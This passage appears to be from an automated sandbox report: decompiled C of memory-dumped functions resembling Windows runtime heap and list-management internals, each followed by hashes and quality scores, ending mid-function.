                                                    			E04BC7794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
                                                    				intOrPtr _v8;
                                                    				intOrPtr _v12;
                                                    				intOrPtr _t21;
                                                    				void* _t24;
                                                    				intOrPtr _t25;
                                                    				void* _t36;
                                                    				short _t39;
                                                    				signed char* _t42;
                                                    				unsigned int _t46;
                                                    				void* _t50;
                                                    
                                                    				_push(__ecx);
                                                    				_push(__ecx);
                                                    				_t21 =  *0x4c37b9c; // 0x0
                                                    				_t46 = _a8;
                                                    				_v12 = __edx;
                                                    				_v8 = __ecx;
                                                    				_t4 = _t46 + 0x2e; // 0x2e
                                                    				_t36 = _t4;
                                                    				_t24 = L04B64620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
                                                    				_t50 = _t24;
                                                    				if(_t50 != 0) {
                                                    					_t25 = _a4;
                                                    					if(_t25 == 5) {
                                                    						L3:
                                                    						_t39 = 0x14b1;
                                                    					} else {
                                                    						_t39 = 0x14b0;
                                                    						if(_t25 == 6) {
                                                    							goto L3;
                                                    						}
                                                    					}
                                                    					 *((short*)(_t50 + 6)) = _t39;
                                                    					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
                                                    					_t11 = _t50 + 0x2c; // 0x2c
                                                    					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
                                                    					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
                                                    					E04B8F3E0(_t11, _a12, _t46);
                                                    					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
                                                    					if(E04B67D50() == 0) {
                                                    						_t42 = 0x7ffe0384;
                                                    					} else {
                                                    						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                    					}
                                                    					_push(_t50);
                                                    					_t19 = _t36 - 0x20; // 0xe
                                                    					_push(0x403);
                                                    					_push( *_t42 & 0x000000ff);
                                                    					E04B89AE0();
                                                    					_t24 = L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
                                                    				}
                                                    				return _t24;
                                                    			}














                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 54191fa4ae02d7c13427870c87b2321cc0530287664558e72172a9147265cf65
                                                    • Instruction ID: b29f11dde4bb69cdd73766850023bab6e6b2f03930aaa3f150b91f7d8e51e3eb
                                                    • Opcode Fuzzy Hash: 54191fa4ae02d7c13427870c87b2321cc0530287664558e72172a9147265cf65
                                                    • Instruction Fuzzy Hash: 60219072900A04AFD725DF69DC90E6BB7B9EF48744F1045AEF60AD7750EA34E900CBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 93%
                                                    			E04B7FD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                    				intOrPtr _v8;
                                                    				void* _t19;
                                                    				intOrPtr _t29;
                                                    				intOrPtr _t32;
                                                    				intOrPtr _t35;
                                                    				intOrPtr _t37;
                                                    				intOrPtr* _t40;
                                                    
                                                    				_t35 = __edx;
                                                    				_push(__ecx);
                                                    				_push(__ecx);
                                                    				_t37 = 0;
                                                    				_v8 = __edx;
                                                    				_t29 = __ecx;
                                                    				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
                                                    					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
                                                    					L3:
                                                    					_t19 = _a4 - 4;
                                                    					if(_t19 != 0) {
                                                    						if(_t19 != 1) {
                                                    							L7:
                                                    							return _t37;
                                                    						}
                                                    						if(_t35 == 0) {
                                                    							L11:
                                                    							_t37 = 0xc000000d;
                                                    							goto L7;
                                                    						}
                                                    						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
                                                    							L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
                                                    							_t35 = _v8;
                                                    						}
                                                    						 *((intOrPtr*)(_t40 + 4)) = _t35;
                                                    						goto L7;
                                                    					}
                                                    					if(_t29 == 0) {
                                                    						goto L11;
                                                    					}
                                                    					_t32 =  *_t40;
                                                    					if(_t32 != 0) {
                                                    						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
                                                    						E04B576E2( *_t40);
                                                    					}
                                                    					 *_t40 = _t29;
                                                    					goto L7;
                                                    				}
                                                    				_t40 = L04B64620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
                                                    				if(_t40 == 0) {
                                                    					_t37 = 0xc0000017;
                                                    					goto L7;
                                                    				}
                                                    				_t35 = _v8;
                                                    				 *_t40 = 0;
                                                    				 *((intOrPtr*)(_t40 + 4)) = 0;
                                                    				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
                                                    				goto L3;
                                                    			}











                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                    • Instruction ID: d65cf5d6444b8949b5fb72a45f0f77187db0f5cfc4ec7bc58b045e6723cb35a9
                                                    • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                    • Instruction Fuzzy Hash: 30216872A00A40DBD731CF49C540A76B7E5EB98B10F2485AEE96987610E734AD00EB94
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 77%
                                                    			E04B49240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                                                    				intOrPtr _t33;
                                                    				intOrPtr _t37;
                                                    				intOrPtr _t41;
                                                    				intOrPtr* _t46;
                                                    				void* _t48;
                                                    				intOrPtr _t50;
                                                    				intOrPtr* _t60;
                                                    				void* _t61;
                                                    				intOrPtr _t62;
                                                    				intOrPtr _t65;
                                                    				void* _t66;
                                                    				void* _t68;
                                                    
                                                    				_push(0xc);
                                                    				_push(0x4c1f708);
                                                    				E04B9D08C(__ebx, __edi, __esi);
                                                    				_t65 = __ecx;
                                                    				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
                                                    				if( *(__ecx + 0x24) != 0) {
                                                    					_push( *(__ecx + 0x24));
                                                    					E04B895D0();
                                                    					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
                                                    				}
                                                    				L6();
                                                    				L6();
                                                    				_push( *((intOrPtr*)(_t65 + 0x28)));
                                                    				E04B895D0();
                                                    				_t33 =  *0x4c384c4; // 0x0
                                                    				L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
                                                    				_t37 =  *0x4c384c4; // 0x0
                                                    				L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
                                                    				_t41 =  *0x4c384c4; // 0x0
                                                    				E04B62280(L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x4c386b4);
                                                    				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
                                                    				_t46 = _t65 + 0xe8;
                                                    				_t62 =  *_t46;
                                                    				_t60 =  *((intOrPtr*)(_t46 + 4));
                                                    				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
                                                    					_t61 = 3;
                                                    					asm("int 0x29");
                                                    					_push(_t65);
                                                    					_t66 = _t61;
                                                    					_t23 = _t66 + 0x14; // 0x8df8084c
                                                    					_push( *_t23);
                                                    					E04B895D0();
                                                    					_t24 = _t66 + 0x10; // 0x89e04d8b
                                                    					_push( *_t24);
                                                    					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
                                                    					_t48 = E04B895D0();
                                                    					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
                                                    					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
                                                    					return _t48;
                                                    				} else {
                                                    					 *_t60 = _t62;
                                                    					 *((intOrPtr*)(_t62 + 4)) = _t60;
                                                    					 *(_t68 - 4) = 0xfffffffe;
                                                    					E04B49325();
                                                    					_t50 =  *0x4c384c4; // 0x0
                                                    					return E04B9D0D1(L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
                                                    				}
                                                    			}
















                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 2c13cf61a64aa9926087b33085841867a137c10ed9f6dcc90a932bc788dcd3af
                                                    • Instruction ID: 82f513368cda70f265415021c6adcbd575a7b5531f5955b9ddc5fc36d9ff35b2
                                                    • Opcode Fuzzy Hash: 2c13cf61a64aa9926087b33085841867a137c10ed9f6dcc90a932bc788dcd3af
                                                    • Instruction Fuzzy Hash: AE212872151600EFD721FF28CA50F5AB7F9FF08708F1445A8A04A87AA1CB38F941DB94
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 54%
                                                    			E04B7B390(void* __ecx, intOrPtr _a4) {
                                                    				signed int _v8;
                                                    				signed char _t12;
                                                    				signed int _t16;
                                                    				signed int _t21;
                                                    				void* _t28;
                                                    				signed int _t30;
                                                    				signed int _t36;
                                                    				signed int _t41;
                                                    
                                                    				_push(__ecx);
                                                    				_t41 = _a4 + 0xffffffb8;
                                                    				E04B62280(_t12, 0x4c38608);
                                                    				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
                                                    				asm("sbb edi, edi");
                                                    				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
                                                    				_v8 = _t36;
                                                    				asm("lock cmpxchg [ebx], ecx");
                                                    				_t30 = 1;
                                                    				if(1 != 1) {
                                                    					while(1) {
                                                    						_t21 = _t30 & 0x00000006;
                                                    						_t16 = _t30;
                                                    						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
                                                    						asm("lock cmpxchg [edi], esi");
                                                    						if(_t16 == _t30) {
                                                    							break;
                                                    						}
                                                    						_t30 = _t16;
                                                    					}
                                                    					_t36 = _v8;
                                                    					if(_t21 == 2) {
                                                    						_t16 = E04B800C2(0x4c38608, 0, _t28);
                                                    					}
                                                    				}
                                                    				if(_t36 != 0) {
                                                    					_t16 = L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
                                                    				}
                                                    				return _t16;
                                                    			}












                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6113c107b6dbf8fa820baf14978ea2a08c00ae1c951d645b9cffdae10dba51c3
                                                    • Instruction ID: d642f360bc7a6c8b1bc09676545f37df929aa31b3706ccc4dc01e0213a30f11c
                                                    • Opcode Fuzzy Hash: 6113c107b6dbf8fa820baf14978ea2a08c00ae1c951d645b9cffdae10dba51c3
                                                    • Instruction Fuzzy Hash: 80116F737091105FDB189E148D4197B72A7EBC5334B2501ADED16D73C0D935BC01C6D0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 90%
                                                    			E04BD4257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
                                                    				intOrPtr* _t18;
                                                    				intOrPtr _t24;
                                                    				intOrPtr* _t27;
                                                    				intOrPtr* _t30;
                                                    				intOrPtr* _t31;
                                                    				intOrPtr _t33;
                                                    				intOrPtr* _t34;
                                                    				intOrPtr* _t35;
                                                    				void* _t37;
                                                    				void* _t38;
                                                    				void* _t39;
                                                    				void* _t43;
                                                    
                                                    				_t39 = __eflags;
                                                    				_t35 = __edi;
                                                    				_push(8);
                                                    				_push(0x4c208d0);
                                                    				E04B9D08C(__ebx, __edi, __esi);
                                                    				_t37 = __ecx;
                                                    				E04BD41E8(__ebx, __edi, __ecx, _t39);
                                                    				E04B5EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                    				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
                                                    				_t18 = _t37 + 8;
                                                    				_t33 =  *_t18;
                                                    				_t27 =  *((intOrPtr*)(_t18 + 4));
                                                    				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
                                                    					L8:
                                                    					_push(3);
                                                    					asm("int 0x29");
                                                    				} else {
                                                    					 *_t27 = _t33;
                                                    					 *((intOrPtr*)(_t33 + 4)) = _t27;
                                                    					_t35 = 0x4c387e4;
                                                    					_t18 =  *0x4c387e0; // 0x0
                                                    					while(_t18 != 0) {
                                                    						_t43 = _t18 -  *0x4c35cd0; // 0xffffffff
                                                    						if(_t43 >= 0) {
                                                    							_t31 =  *0x4c387e4; // 0x0
                                                    							_t18 =  *_t31;
                                                    							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
                                                    								goto L8;
                                                    							} else {
                                                    								 *0x4c387e4 = _t18;
                                                    								 *((intOrPtr*)(_t18 + 4)) = _t35;
                                                    								L04B47055(_t31 + 0xfffffff8);
                                                    								_t24 =  *0x4c387e0; // 0x0
                                                    								_t18 = _t24 - 1;
                                                    								 *0x4c387e0 = _t18;
                                                    								continue;
                                                    							}
                                                    						}
                                                    						goto L9;
                                                    					}
                                                    				}
                                                    				L9:
                                                    				__eflags =  *0x4c35cd0;
                                                    				if( *0x4c35cd0 <= 0) {
                                                    					L04B47055(_t37);
                                                    				} else {
                                                    					_t30 = _t37 + 8;
                                                    					_t34 =  *0x4c387e8; // 0x0
                                                    					__eflags =  *_t34 - _t35;
                                                    					if( *_t34 != _t35) {
                                                    						goto L8;
                                                    					} else {
                                                    						 *_t30 = _t35;
                                                    						 *((intOrPtr*)(_t30 + 4)) = _t34;
                                                    						 *_t34 = _t30;
                                                    						 *0x4c387e8 = _t30;
                                                    						 *0x4c387e0 = _t18 + 1;
                                                    					}
                                                    				}
                                                    				 *(_t38 - 4) = 0xfffffffe;
                                                    				return E04B9D0D1(L04BD4320());
                                                    			}
















                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: db7b0bbf81d6cb9716c330c09dcf59fe5b61edc6832660dea2e0cc515aca9ad0
                                                    • Instruction ID: 57d21c7cdaf129cddbdf5db339ce8b7d9c2c259cb5f4351184b81f84d8ee1667
                                                    • Opcode Fuzzy Hash: db7b0bbf81d6cb9716c330c09dcf59fe5b61edc6832660dea2e0cc515aca9ad0
                                                    • Instruction Fuzzy Hash: 1D215E74511601DFDB15EF65D140714B7F2FB8631AB1082EEE1198B250EB35F942CFA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 93%
                                                    			E04BC46A7(signed short* __ecx, unsigned int __edx, char* _a4) {
                                                    				signed short* _v8;
                                                    				unsigned int _v12;
                                                    				intOrPtr _v16;
                                                    				signed int _t22;
                                                    				signed char _t23;
                                                    				short _t32;
                                                    				void* _t38;
                                                    				char* _t40;
                                                    
                                                    				_v12 = __edx;
                                                    				_t29 = 0;
                                                    				_v8 = __ecx;
                                                    				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
                                                    				_t38 = L04B64620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
                                                    				if(_t38 != 0) {
                                                    					_t40 = _a4;
                                                    					 *_t40 = 1;
                                                    					E04B8F3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
                                                    					_t22 = _v12 >> 1;
                                                    					_t32 = 0x2e;
                                                    					 *((short*)(_t38 + _t22 * 2)) = _t32;
                                                    					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
                                                    					_t23 = E04B7D268(_t38, 1);
                                                    					asm("sbb al, al");
                                                    					 *_t40 =  ~_t23 + 1;
                                                    					L04B677F0(_v16, 0, _t38);
                                                    				} else {
                                                    					 *_a4 = 0;
                                                    					_t29 = 0xc0000017;
                                                    				}
                                                    				return _t29;
                                                    			}












                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                    • Instruction ID: 934dcc67b91e324f9393fc446cebc58bb934e6be6654eba3a1d0531af7092b37
                                                    • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                    • Instruction Fuzzy Hash: EF11E572504208BBDB159F5CD8808BEBBB9EF95304F1080AEF945C7350DA359E55D7A4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 34%
                                                    			E04B72397(intOrPtr _a4) {
                                                    				void* __ebx;
                                                    				void* __ecx;
                                                    				void* __edi;
                                                    				void* __esi;
                                                    				void* __ebp;
                                                    				signed int _t11;
                                                    				void* _t19;
                                                    				void* _t25;
                                                    				void* _t26;
                                                    				intOrPtr _t27;
                                                    				void* _t28;
                                                    				void* _t29;
                                                    
                                                    				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
                                                    				if( *0x4c3848c != 0) {
                                                    					L04B6FAD0(0x4c38610);
                                                    					if( *0x4c3848c == 0) {
                                                    						E04B6FA00(0x4c38610, _t19, _t27, 0x4c38610);
                                                    						goto L1;
                                                    					} else {
                                                    						_push(0);
                                                    						_push(_a4);
                                                    						_t26 = 4;
                                                    						_t29 = E04B72581(0x4c38610, 0x4b250a0, _t26, _t27, _t28);
                                                    						E04B6FA00(0x4c38610, 0x4b250a0, _t27, 0x4c38610);
                                                    					}
                                                    				} else {
                                                    					L1:
                                                    					_t11 =  *0x4c38614; // 0x1
                                                    					if(_t11 == 0) {
                                                    						_t11 = E04B84886(0x4b21088, 1, 0x4c38614);
                                                    					}
                                                    					_push(0);
                                                    					_push(_a4);
                                                    					_t25 = 4;
                                                    					_t29 = E04B72581(0x4c38610, (_t11 << 4) + 0x4b25070, _t25, _t27, _t28);
                                                    				}
                                                    				if(_t29 != 0) {
                                                    					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
                                                    					 *((char*)(_t29 + 0x40)) = 0;
                                                    				}
                                                    				return _t29;
                                                    			}
















                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ce2886ed46190ae42649249525218db7063969584dcfe7510fe80ec49e585453
                                                    • Instruction ID: 77245dce04ce49cb4fc0de9e4b6c68f6988619870e12dd6513c191f3244c2024
                                                    • Opcode Fuzzy Hash: ce2886ed46190ae42649249525218db7063969584dcfe7510fe80ec49e585453
                                                    • Instruction Fuzzy Hash: 05114E327007106BF334AA39AC40F26B2EDEB50719F1544E6F616B7280D5B4F84187A5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 42%
                                                    			E04B4C962(char __ecx) {
                                                    				signed int _v8;
                                                    				intOrPtr _v12;
                                                    				void* __ebx;
                                                    				void* __edi;
                                                    				void* __esi;
                                                    				intOrPtr _t19;
                                                    				char _t22;
                                                    				intOrPtr _t26;
                                                    				intOrPtr _t27;
                                                    				char _t32;
                                                    				char _t34;
                                                    				intOrPtr _t35;
                                                    				intOrPtr _t37;
                                                    				intOrPtr* _t38;
                                                    				signed int _t39;
                                                    
                                                    				_t41 = (_t39 & 0xfffffff8) - 0xc;
                                                    				_v8 =  *0x4c3d360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
                                                    				_t34 = __ecx;
                                                    				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
                                                    					_t26 = 0;
                                                    					E04B5EEF0(0x4c370a0);
                                                    					_t29 =  *((intOrPtr*)(_t34 + 0x18));
                                                    					if(E04BCF625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
                                                    						L9:
                                                    						E04B5EB70(_t29, 0x4c370a0);
                                                    						_t19 = _t26;
                                                    						L2:
                                                    						_pop(_t35);
                                                    						_pop(_t37);
                                                    						_pop(_t27);
                                                    						return E04B8B640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
                                                    					}
                                                    					_t29 = _t34;
                                                    					_t26 = E04BCF1FC(_t34, _t32);
                                                    					if(_t26 < 0) {
                                                    						goto L9;
                                                    					}
                                                    					_t38 =  *0x4c370c0; // 0x0
                                                    					while(_t38 != 0x4c370c0) {
                                                    						_t22 =  *((intOrPtr*)(_t38 + 0x18));
                                                    						_t38 =  *_t38;
                                                    						_v12 = _t22;
                                                    						if(_t22 != 0) {
                                                    							_t29 = _t22;
                                                    							 *0x4c3b1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
                                                    							_v12();
                                                    						}
                                                    					}
                                                    					goto L9;
                                                    				}
                                                    				_t19 = 0;
                                                    				goto L2;
                                                    			}



















                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0e2b25b0b106daf7e7b92171fbed8e612c0546a2bedb7e7d7de12a2f880c9a7d
                                                    • Instruction ID: 0e3843a9116c59648953e56faf20e6994a8803746c1889d2fe3d8fe720878fb2
                                                    • Opcode Fuzzy Hash: 0e2b25b0b106daf7e7b92171fbed8e612c0546a2bedb7e7d7de12a2f880c9a7d
                                                    • Instruction Fuzzy Hash: 3611CE313006069BDB52AF68D985ABAB7A6FBC4615B0005BDF88197660EFA0FD14CBD1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 87%
                                                    			E04B837F5(void* __ecx, intOrPtr* __edx) {
                                                    				void* __ebx;
                                                    				void* __edi;
                                                    				signed char _t6;
                                                    				intOrPtr _t13;
                                                    				intOrPtr* _t20;
                                                    				intOrPtr* _t27;
                                                    				void* _t28;
                                                    				intOrPtr* _t29;
                                                    
                                                    				_t27 = __edx;
                                                    				_t28 = __ecx;
                                                    				if(__edx == 0) {
                                                    					E04B62280(_t6, 0x4c38550);
                                                    				}
                                                    				_t29 = E04B8387E(_t28);
                                                    				if(_t29 == 0) {
                                                    					L6:
                                                    					if(_t27 == 0) {
                                                    						E04B5FFB0(0x4c38550, _t27, 0x4c38550);
                                                    					}
                                                    					if(_t29 == 0) {
                                                    						return 0xc0000225;
                                                    					} else {
                                                    						if(_t27 != 0) {
                                                    							goto L14;
                                                    						}
                                                    						L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
                                                    						goto L11;
                                                    					}
                                                    				} else {
                                                    					_t13 =  *_t29;
                                                    					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
                                                    						L13:
                                                    						_push(3);
                                                    						asm("int 0x29");
                                                    						L14:
                                                    						 *_t27 = _t29;
                                                    						L11:
                                                    						return 0;
                                                    					}
                                                    					_t20 =  *((intOrPtr*)(_t29 + 4));
                                                    					if( *_t20 != _t29) {
                                                    						goto L13;
                                                    					}
                                                    					 *_t20 = _t13;
                                                    					 *((intOrPtr*)(_t13 + 4)) = _t20;
                                                    					asm("btr eax, ecx");
                                                    					goto L6;
                                                    				}
                                                    			}












                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5775705f9e9215f6d6b0eb92678a5bfb81008280144fa80e55326b6a0e41c14e
                                                    • Instruction ID: 4414126b8071c7b131fc16d705afea52379c13faa31a29d2e21780150c16cb0e
                                                    • Opcode Fuzzy Hash: 5775705f9e9215f6d6b0eb92678a5bfb81008280144fa80e55326b6a0e41c14e
                                                    • Instruction Fuzzy Hash: 260122B2A026109BD337AB1AD900E26BBE6DF81F6071550EDEC0A8B210EB35F800C7C0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E04B7002D() {
                                                    				void* _t11;
                                                    				char* _t14;
                                                    				signed char* _t16;
                                                    				char* _t27;
                                                    				signed char* _t29;
                                                    
                                                    				_t11 = E04B67D50();
                                                    				_t27 = 0x7ffe0384;
                                                    				if(_t11 != 0) {
                                                    					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                    				} else {
                                                    					_t14 = 0x7ffe0384;
                                                    				}
                                                    				_t29 = 0x7ffe0385;
                                                    				if( *_t14 != 0) {
                                                    					if(E04B67D50() == 0) {
                                                    						_t16 = 0x7ffe0385;
                                                    					} else {
                                                    						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                    					}
                                                    					if(( *_t16 & 0x00000040) != 0) {
                                                    						goto L18;
                                                    					} else {
                                                    						goto L3;
                                                    					}
                                                    				} else {
                                                    					L3:
                                                    					if(E04B67D50() != 0) {
                                                    						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                    					}
                                                    					if( *_t27 != 0) {
                                                    						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
                                                    							goto L5;
                                                    						}
                                                    						if(E04B67D50() != 0) {
                                                    							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                    						}
                                                    						if(( *_t29 & 0x00000020) == 0) {
                                                    							goto L5;
                                                    						}
                                                    						L18:
                                                    						return 1;
                                                    					} else {
                                                    						L5:
                                                    						return 0;
                                                    					}
                                                    				}
                                                    			}









                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                    • Instruction ID: 3fe18aec1d91bfe77ae174d0976b9c60f95fa6ba86d4c15700f4a0fb94d9902d
                                                    • Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                    • Instruction Fuzzy Hash: CA11E1722016848FE732AB38C954B757794FB417ACF0900E2DE5587693EB68F841D2A0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 94%
                                                    			E04B5766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
                                                    				char _v8;
                                                    				void* _t22;
                                                    				void* _t24;
                                                    				intOrPtr _t29;
                                                    				intOrPtr* _t30;
                                                    				void* _t42;
                                                    				intOrPtr _t47;
                                                    
                                                    				_push(__ecx);
                                                    				_t36 =  &_v8;
                                                    				if(E04B7F3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
